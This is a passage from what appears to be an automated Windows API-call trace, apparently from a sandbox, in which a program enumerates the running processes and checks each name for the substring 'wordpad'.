lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.601] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356df20 [0100.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x356df20, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0100.601] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0100.601] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="wordpad") returned 0x0 [0100.601] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0100.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.602] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356dfe0 [0100.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x356dfe0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0100.602] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0100.602] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="wordpad") returned 0x0 [0100.602] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.603] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356dec0 [0100.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356dec0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.603] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.603] StrStrIA (lpFirst="svchost.exe", lpSrch="wordpad") returned 0x0 [0100.603] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0100.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0100.604] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e118 [0100.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x357e118, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0100.604] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0100.604] StrStrIA (lpFirst="dwm.exe", lpSrch="wordpad") returned 0x0 [0100.604] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.606] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e010 [0100.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356e010, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.606] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.606] StrStrIA (lpFirst="svchost.exe", lpSrch="wordpad") returned 0x0 [0100.606] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.607] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e028 [0100.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356e028, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.607] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.607] StrStrIA (lpFirst="svchost.exe", lpSrch="wordpad") returned 0x0 [0100.607] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.608] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356dde8 [0100.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356dde8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.608] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.608] StrStrIA (lpFirst="svchost.exe", lpSrch="wordpad") returned 0x0 [0100.608] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.609] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e070 [0100.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356e070, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.609] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.609] StrStrIA (lpFirst="svchost.exe", lpSrch="wordpad") returned 0x0 [0100.609] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.610] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356df38 [0100.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356df38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.611] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.611] StrStrIA (lpFirst="svchost.exe", lpSrch="wordpad") returned 0x0 [0100.611] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.614] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e088 [0100.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356e088, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.614] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.614] StrStrIA (lpFirst="svchost.exe", lpSrch="wordpad") returned 0x0 [0100.614] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.616] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e040 [0100.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356e040, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.616] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.616] StrStrIA (lpFirst="svchost.exe", lpSrch="wordpad") returned 0x0 [0100.616] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.617] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356dfc8 [0100.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356dfc8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.617] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.617] StrStrIA (lpFirst="svchost.exe", lpSrch="wordpad") returned 0x0 [0100.617] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.618] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e058 [0100.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356e058, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.618] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.619] StrStrIA (lpFirst="svchost.exe", lpSrch="wordpad") returned 0x0 [0100.619] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.620] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356df80 [0100.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356df80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.620] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.620] StrStrIA (lpFirst="svchost.exe", lpSrch="wordpad") returned 0x0 [0100.620] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0100.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.621] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356dda0 [0100.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x356dda0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0100.621] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0100.621] StrStrIA (lpFirst="spoolsv.exe", lpSrch="wordpad") returned 0x0 [0100.621] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.622] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356ddb8 [0100.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356ddb8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.622] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.622] StrStrIA (lpFirst="svchost.exe", lpSrch="wordpad") returned 0x0 [0100.622] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0100.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.623] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356ddd0 [0100.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x356ddd0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0100.623] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0100.623] StrStrIA (lpFirst="audiodg.exe", lpSrch="wordpad") returned 0x0 [0100.623] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0100.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.625] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356de00 [0100.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x356de00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0100.625] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0100.625] StrStrIA (lpFirst="sihost.exe", lpSrch="wordpad") returned 0x0 [0100.625] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.626] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356de30 [0100.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356de30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.626] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.626] StrStrIA (lpFirst="svchost.exe", lpSrch="wordpad") returned 0x0 [0100.626] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0100.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.628] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356de90 [0100.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x356de90, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0100.628] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0100.628] StrStrIA (lpFirst="taskhostw.exe", lpSrch="wordpad") returned 0x0 [0100.628] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0100.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.629] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356de48 [0100.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x356de48, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0100.630] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0100.630] StrStrIA (lpFirst="explorer.exe", lpSrch="wordpad") returned 0x0 [0100.630] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0100.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.631] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357d368 [0100.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x357d368, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0100.631] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0100.631] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="wordpad") returned 0x0 [0100.631] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0100.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0100.632] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356beb0 [0100.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x356beb0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0100.633] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0100.633] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="wordpad") returned 0x0 [0100.633] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0100.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.634] LocalAlloc 